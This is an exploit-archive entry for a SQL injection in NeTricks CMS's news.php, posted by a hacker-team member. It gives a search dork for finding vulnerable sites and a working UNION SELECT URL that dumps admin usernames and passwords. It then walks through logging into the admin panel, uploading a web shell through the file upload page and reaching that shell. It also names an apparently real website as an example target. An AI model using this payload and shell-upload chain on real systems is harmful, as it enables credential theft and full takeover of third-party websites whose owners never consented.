NeTricks CMS (news.php) SQL Injection Vulnerability

2010-05-24T00:00:00
ID 1337DAY-ID-12389
Type zdt
Reporter Dr.SiLnT HilL
Modified 2010-05-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
NeTricks CMS (news.php) SQL Injection Vulnerability
===================================================



####################################################################################################################################

# Name: Website Design and Hosting By Netricks, Inc.

# Date: 25-05-2010

# vendor: http://www.netricks.com

# Dork: intext:" Website Design and Hosting By Netricks, Inc."

# Discovered By: Dr.SiLnT HilL

# Contact : [email protected]

# MY Team : TeaM HacKer Egypt

###################################################################################################################################



[+] SQL Injection Vulnerability:


[+] Vulnerability: http://[site]/[path]/news.php?ax=v&n=10&id=10&nid==[SQL Injection]


[+][+] Exploit [+][+]


 http://[site]/[path]/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,group_concat(username,0x3e,password),3,4,5+from+php_users--


[+][+] Admin Panel [+][+]


http://localhost/[path]/admin


[+][+] Upload your shell [+][+]


http://[site]/[path]/admin/content.php?ax=file_upload



[+][+] your shell [+][+]


http://[site]/[path]/gallery/shell.php


[+][+] Example [+][+]


http://clovisnewhomes.net

#####################################
Th4nks : Mr.AlsaeeK , Mr.Fire Stormm 
#####################################



#  0day.today [2018-03-09]  #